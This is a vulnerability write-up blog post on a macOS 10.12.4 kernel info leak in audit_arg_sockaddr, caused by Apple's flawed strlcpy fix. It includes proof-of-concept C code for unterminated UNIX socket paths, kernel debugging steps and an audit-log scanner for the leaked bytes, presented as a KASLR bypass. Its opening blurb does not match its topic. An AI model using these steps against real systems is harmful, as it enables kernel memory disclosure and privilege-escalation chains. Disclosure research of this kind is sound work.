Two Bugs, One Func() part 2

> part ii: a kernel info leak 0day, thanks to Apple’s fix

Aloha, it’s Patrick, Chief Security Researcher at Synack. In my free time, I also run a small OS X security website, objective-see.com, where I share my personal OS X security tools and blog about OS X security and coding topics. Below is one such post originally published on my site, which discusses one of my tools and, more generally, one way to monitor process creation on OS X. Read & enjoy!

Background
The first part of this multi-part blog series showed how to track down the cause of a kernel panic on macOS 10.12.3. In short, it turned out that if a UNIX socket structure (sockaddr_un) was allocated exactly at the end of a memory page with an unmapped page adjacent, an off-by-one read error would trigger a kernel panic if auditing was enabled.

Sure, you could panic a system. However, as far as I could tell, this bug was not exploitable. That is to say, from a security point of view it was rather uninteresting.

For this second blog post, I originally planned to briefly cover Apple’s fix for this bug, before diving into a second more serious bug I discovered within the same audit_arg_sockaddr function. This second bug, a ring-0 heap overflow, provided a mechanism to execute arbitrary code within the context of the kernel. Ya, quite bad!

However, after spending about 2 seconds looking at their ‘fix’ (released in macOS 10.12.4), it was apparent that not only did it not address the issue, but it actually made things far worse by introducing a new security vulnerability 🙁 Note that at this time, this bug is a 0day, though it requires network level (‘nt’) auditing to be enabled (which can be turned on with root privileges).

Recall that the buggy code in macOS 10.12.3 was simply trying to make a copy of a UNIX socket’s path, sun_path, for auditing purposes. Since such socket paths do not have to be NULL-terminated, the code attempted to account for this…and did so almost correctly. As we showed in the previous blog post though, the following chunk of Apple code, sun->sun_path[slen] != 0, contains an off-by-one read error that could lead to a kernel panic:

This fix makes absolutely zero sense – and actually introduces an even worse bug! Why? In short, strlcpy simply copies until it finds a NULL (0x0) or until the destination buffer (‘path’) is full. As UNIX socket paths (sun_path) don’t have to be NULL-terminated, this code can still panic the box (as it reads past the end of the sockaddr_un structure), or worse yet, leak random kernel memory into an audit path that’s accessible in user-mode! #facepalm

Let’s take a closer look at all of this. First showing how to create a UNIX socket that triggers this buggy code, and then dynamically debugging the vulnerability in ring-0. We’ll end by showing how to dump kernel memory into user mode, thanks to Apple’s new ‘fix’ 😛

UNIX Sockets
First one of my favorite nerd jokes:

Now that’s out of the way, let’s show how to create a UNIX socket that has a non-NULL-terminated path. Recall that UNIX sockets are described via the sockaddr_un structure, which is declared in sys/un.h:
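As a quick way to check the layout on your own system, here is a minimal sketch that reports where sun_path begins and how large it is declared. The helper names (sun_path_offset, sun_path_capacity) are hypothetical and not from the original post; the sizes noted in the comments are the values found in the macOS and Linux headers.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Offset of sun_path inside struct sockaddr_un. The bytes before it hold
 * the header: sun_len + sun_family on macOS, a 2-byte sun_family on Linux. */
size_t sun_path_offset(void)
{
    return offsetof(struct sockaddr_un, sun_path);
}

/* Declared capacity of sun_path (104 bytes on macOS, 108 on Linux). */
size_t sun_path_capacity(void)
{
    struct sockaddr_un sun;

    /* Sanity check: header plus path can never exceed the whole struct. */
    assert(offsetof(struct sockaddr_un, sun_path) + sizeof(sun.sun_path)
           <= sizeof(sun));
    return sizeof(sun.sun_path);
}
```

The offset of 2 is what matters later on: a 128-byte socket name leaves 126 bytes for the path itself.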

Creating a UNIX socket is simple! First, create a socket of type AF_UNIX, then initialize a sockaddr_un structure with the socket’s path. Pass this to the bind function to, well, bind the path to the socket. Confirm via the getsockname function.

When run, the following code successfully creates a UNIX socket, binds it to /tmp/unixSocket, then retrieves the bound name in order to print it out.
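A minimal sketch of those steps (socket, bind, getsockname) might look like the following. The helper name bind_and_query and its parameters are assumptions made for illustration; only the system calls themselves come from the text.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

/* Binds a new AF_UNIX socket to `path`, then writes the name reported by
 * getsockname() into `out`. Returns 0 on success, -1 on failure. */
int bind_and_query(const char *path, char *out, size_t outlen)
{
    struct sockaddr_un addr, bound;
    socklen_t len = sizeof(bound);
    int fd;

    assert(path != NULL && out != NULL && outlen > 0);
    if (strlen(path) >= sizeof(addr.sun_path))
        return -1;                          /* path would not fit */

    fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;

    memset(&addr, 0, sizeof(addr));         /* zeroing NUL-terminates the path */
    addr.sun_family = AF_UNIX;
    memcpy(addr.sun_path, path, strlen(path));

    unlink(path);                           /* remove a stale socket file, if any */
    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
        close(fd);
        return -1;
    }

    memset(&bound, 0, sizeof(bound));
    if (getsockname(fd, (struct sockaddr *)&bound, &len) != 0) {
        close(fd);
        unlink(path);
        return -1;
    }

    /* Bounded print: never read beyond sun_path itself. */
    snprintf(out, outlen, "%.*s", (int)sizeof(bound.sun_path), bound.sun_path);
    close(fd);
    unlink(path);                           /* clean up the socket file */
    return 0;
}
```

Calling bind_and_query("/tmp/unixSocket", buf, sizeof(buf)) should leave the same path in buf. Note that this ordinary case is NULL-terminated only because the structure was zeroed first.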

Since the open-source part of macOS 10.12.4 was just released, it is pretty easy to see what’s going on behind the scenes. Specifically let’s look at how a path such as ‘/tmp/unixSocket’ gets bound to a socket.

The bind function is implemented in the kernel, within the uipc_syscalls.c file. After various sanity checks, bind invokes either the getsockaddr or getsockaddr_s function to bind the path to the socket:

Pretty straightforward, ya? The most interesting thing for us here, though, is that nothing in this code ensures that the socket path is NULL-terminated (copyin just does a straight byte-by-byte copy). This is by design, for reasons explained in the following quote:

“Note that bind() is a generic system call. Its definition allows it to be used for many different address familys, each of which has a different format for addresses. For UNIX domain socket, they are path names. For INET sockets, they are 32-bit internet addresses. The bind() code cannot make any assumptions about the format of the address, it just copies it in as an opaque object.” (source)

Other sources such as ‘Addressing within the AF_UNIX Domain’ confirm this, stating, “The sun_path field contains the name of the file which represents the open socket. It need not be null delimited.”

However, it should be noted that code within both getsockaddr and getsockaddr_s (such as bzero(ss, sizeof (*ss))) zeros out the entire sockaddr_storage structure before copying in the name. So if the socket path doesn’t fill the entire struct sockaddr_storage (‘ss’), it will inadvertently be NULL-terminated. This just means: create a long enough path and it won’t be terminated with a NULL (0x0).
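The zero-then-copy behavior can be modeled in user mode. This is only a sketch, not Apple’s code: memset stands in for bzero, memcpy stands in for copyin, and the function names (model_copy_sockaddr, path_is_terminated) are hypothetical.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>

/* User-mode model of the kernel's zero-then-copy step.
 * Returns 0 on success, -1 if the name does not fit in the storage. */
int model_copy_sockaddr(struct sockaddr_storage *ss, const void *uaddr, size_t len)
{
    assert(ss != NULL && uaddr != NULL);
    if (len > sizeof(*ss))
        return -1;                  /* too large for the fixed-size storage */

    memset(ss, 0, sizeof(*ss));     /* stands in for bzero(ss, sizeof (*ss)) */
    memcpy(ss, uaddr, len);         /* stands in for copyin */
    return 0;
}

/* Returns 1 if a NUL byte appears anywhere in the path region
 * (offset 2 onward) of the storage, 0 otherwise. */
int path_is_terminated(const struct sockaddr_storage *ss)
{
    const unsigned char *p = (const unsigned char *)ss;

    return memchr(p + 2, 0, sizeof(*ss) - 2) != NULL;
}
```

With a 32-byte name the leftover zeroed bytes terminate the path; with a name that is exactly sizeof(struct sockaddr_storage) bytes long and contains no zero bytes, nothing does.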

Below is a snippet of code that creates a ‘legal’ socket path that does fill up the entire structure, thus ensuring it is not NULL-terminated.
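One way to build such a name is sketched below, under the assumption that filling a struct sockaddr_storage with non-zero bytes is equivalent to what the post describes. The function names, the ‘/tmp/’ prefix, and the ‘A’ filler are illustrative choices, not taken from the original listing. Other systems may reject a 128-byte AF_UNIX name, so bind_unterminated is only expected to succeed on macOS.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Fills all 128 bytes of `ss` so that no NUL byte follows the 2-byte header. */
void build_unterminated_name(struct sockaddr_storage *ss)
{
    unsigned char *p = (unsigned char *)ss;

    assert(ss != NULL);
    memset(ss, 'A', sizeof(*ss));       /* every path byte is non-zero */
#ifdef __APPLE__
    ss->ss_len = sizeof(*ss);           /* macOS keeps a 1-byte length field */
#endif
    ss->ss_family = AF_UNIX;
    memcpy(p + 2, "/tmp/", 5);          /* path region begins at offset 2 */
}

/* Binds a fresh AF_UNIX socket using the full 128-byte name.
 * Returns the socket descriptor, or -1 on failure. */
int bind_unterminated(void)
{
    struct sockaddr_storage ss;
    int fd = socket(AF_UNIX, SOCK_STREAM, 0);

    if (fd < 0)
        return -1;

    build_unterminated_name(&ss);
    if (bind(fd, (struct sockaddr *)&ss, sizeof(ss)) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}
```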

What’s special about the size 128? This is the maximum size (‘_SS_MAXSIZE’) of a struct sockaddr_storage, the structure getsockaddr_s populates with the path name. This structure is declared in bsd/sys/socket.h:

Executing the above code creates a UNIX socket that fully fills up a sockaddr_storage structure, thus ensuring the path component is not NULL-terminated. Again, this is perfectly legal as there is nothing saying the path has to be NULL-terminated 🙂

If auditing is enabled, the audit_arg_sockaddr function will be invoked to audit socket operations, such as when a UNIX socket is bound. Again, here is Apple’s new (macOS 10.12.4) code for auditing UNIX sockets within the audit_arg_sockaddr function:

In short, it tries to make a copy (via the strlcpy function) of the socket’s path. The source buffer is the UNIX socket’s path, sun_path, while the destination is a variable named ‘path’.

The first (obvious?) issue is that since the UNIX socket’s path, sun_path, isn’t NULL-terminated, strlcpy will just keep copying random bytes into ‘path’ until it encounters a NULL (0x0), or until the ‘path’ buffer (size: SOCK_MAXADDRLEN – 2 + 1 = 254) is filled up. If sensitive kernel memory (pointers, etc.) is found adjacent to the UNIX socket structure, it could be (partially) copied into the path buffer. The following diagram illustrates this foo’bar’d copy, showing strlcpy copying ‘extra’ bytes into ‘path’ until it encounters a NULL:

This may be used to bypass KASLR, as the path (now appended with random kernel data) is propagated to user-mode (specifically, it makes its way into the audit database):

Generate a ‘Non-Maskable Interrupt’ (NMI)
On the debuggee machine (the VM), hit command+alt+control+shift+esc (all at once) to generate a non-maskable interrupt. This will trigger a catchable debug event!

Connect to the Debuggee
Hop back to the debugger machine (the host) and type: kdp-remote <ip addr of vm>

Since this breakpoint will be triggered countless times (anytime any code on the system binds an address or path to a socket), let’s instruct the debugger to only break on certain sockets. Specifically ones that are exactly 128 bytes in length (i.e. the ‘evil’ UNIX sockets we are creating with non-NULL-terminated paths). We can do this with the br ‘mod’ command. Note that the size of the socket being passed into bind will be at offset +0x10 within a structure pointed to by $RSI:

(lldb) br mod -c '*(int*)($rsi+0x10)==128'

In the VM (the macOS instance we are debugging), execute the code that creates a UNIX socket with a non-NULL-terminated path:

We cannot (yet) access the name (at address 140241106108416/0x7f8c6d500000), as that’s a user-mode address (which AFAIK, can’t be directly accessed via lldb in the context of the kernel). But no worries, we can just set a breakpoint right after the copyin function call (in the getsockaddr_s function, which has actually been compiled inline into the bind function). As copyin copies the UNIX socket’s name into kernel mode, it will then be viewable in the debugger.

With auditing enabled on the VM, set a breakpoint within audit_arg_sockaddr, the buggy function. Specifically, set a breakpoint on the code within the function that handles the auditing of UNIX sockets (address: 0xffffff8010120e47):

Number of Bytes Copied: 127 ($RAX)
Recall that the path of the UNIX socket, sun_path, starts at offset 0x2 inside the sockaddr_un structure. Since the socket we created was 128 bytes, this means the path is 126 bytes (128 – 2). Since 127 bytes were copied, this means one extra byte outside the socket was leaked ‘into’ the ‘path’ variable.

Why just one? If we dump the memory just past the sockaddr_un structure, we can see it happens to be 0xd7 0x00. The strlcpy function stops when it hits a 0x0 (NULL). Thus only one byte, 0xd7, was leaked.
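The arithmetic above can be reproduced with a small user-mode model. This is a sketch under stated assumptions: model_strlcpy is a hypothetical stand-in for the kernel’s strlcpy (it returns the number of bytes actually copied, whereas the real strlcpy returns the length of the source string), and the 254-byte buffer size is the figure quoted earlier in the post.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_PATH_BUF 254  /* SOCK_MAXADDRLEN - 2 + 1, as stated in the post */

/* Stand-in for strlcpy: copies until a NUL is found in src or dst is full,
 * always terminates dst, and returns the number of bytes copied. */
size_t model_strlcpy(char *dst, const char *src, size_t dstsize)
{
    size_t i = 0;

    assert(dst != NULL && src != NULL && dstsize > 0);
    while (i + 1 < dstsize && src[i] != '\0') {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
    return i;
}

/* `mem` models kernel memory: a socket name of `socklen` bytes followed by
 * whatever happens to sit next to it. The caller must supply either a NUL
 * byte or at least 2 + MODEL_PATH_BUF bytes of readable memory.
 * Returns how many bytes beyond the socket's own path were copied. */
size_t leaked_bytes(const unsigned char *mem, size_t socklen)
{
    char path[MODEL_PATH_BUF];
    size_t pathlen = socklen - 2;       /* sun_path starts at offset 2 */
    size_t copied = model_strlcpy(path, (const char *)mem + 2, sizeof(path));

    return copied > pathlen ? copied - pathlen : 0;
}
```

For a 128-byte name followed by 0xd7 0x00, the model copies 127 bytes and reports 1 leaked byte, matching the value seen in the debugger. If no NUL is adjacent, the copy only stops when the destination buffer is full.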

Want to leak more bytes into the path? Of course you do 🙂 Just increase the size of the socket above 128. This will cause the bind function to allocate the socket structure on the heap (via getsockaddr) instead of the stack.

Moreover, there is no limit to the number of times you can leak kernel data. Just keep creating and binding UNIX sockets 🙂

A’ight, so it is easy to get the kernel to leak bytes into the audit path for a UNIX socket. How do we access this leak in user-mode? That is to say, where do these leaked kernel bytes show up? In the audit log!

Audit logs are stored in /var/audit. If we dump the logs (via hexdump), guess what? There are the leaked kernel bytes.

Leaking random kernel memory to user-mode is of course a security issue. It’s possible that sensitive information (maybe partial hashes, passwords, etc.) may be leaked, or partial pointer addresses that would allow a local attacker to defeat KASLR.
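Rather than eyeballing a hexdump, one could scan the raw log bytes for the socket path and report whatever follows it. The sketch below does not parse the audit record format; it assumes the path was padded with a known filler byte (such as ‘A’), and the function name find_leak and its parameters are hypothetical. Leaked bytes that happen to equal the filler are absorbed into the run and will not be reported.

```c
#include <assert.h>
#include <stddef.h>

/* Finds the first run of at least `min_run` filler bytes in `log` and returns
 * a pointer to the first byte after that run. `*leak_len` receives the number
 * of bytes from there up to the next NUL (or the end of the buffer).
 * Returns NULL if no such run exists. */
const unsigned char *find_leak(const unsigned char *log, size_t loglen,
                               unsigned char filler, size_t min_run,
                               size_t *leak_len)
{
    size_t i = 0;

    assert(log != NULL && leak_len != NULL);
    while (i < loglen) {
        size_t start = i;

        while (i < loglen && log[i] == filler)
            i++;                        /* consume a run of filler bytes */

        if (i - start >= min_run) {
            size_t n = 0;

            while (i + n < loglen && log[i + n] != 0)
                n++;                    /* bytes copied past the real path */
            *leak_len = n;
            return log + i;
        }
        if (i == start)
            i++;                        /* not a filler byte, move on */
    }
    return NULL;
}
```

Reading files under /var/audit requires root privileges, so any program using a helper like this would have to run as root.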

Conclusions
In my last blog post, we discussed an off-by-one bug I found in the macOS 10.12.3 kernel that could cause a kernel panic. I responsibly reported this bug to Apple:

I also reported a second, unique bug: a heap overflow in the macOS 10.12.3 kernel (stay tuned for a blog on this!). Apple closed both bugs as duplicates of some other single bug (huh?). Worse though, as we showed in this blog post, their ‘fix’ (in macOS 10.12.4) for the off-by-one bug:

did not fix the kernel panic

introduced a kernel info leak, that could leak sensitive information or be used to bypass KASLR

Though this bug is an unpatched 0day, it requires auditing to be enabled (which can be turned on if you have root privileges). Moreover, accessing (reading) the leaked kernel memory in the audit log requires root privileges.

On macOS though, even with root privileges one still cannot bypass SIP, nor load unsigned code into the kernel. Thus advanced attackers, even with root privileges, will often exploit a kernel bug to fully compromise a system. Such bugs generally require a KASLR bypass… such as the one we described here. Don’t blame me 😉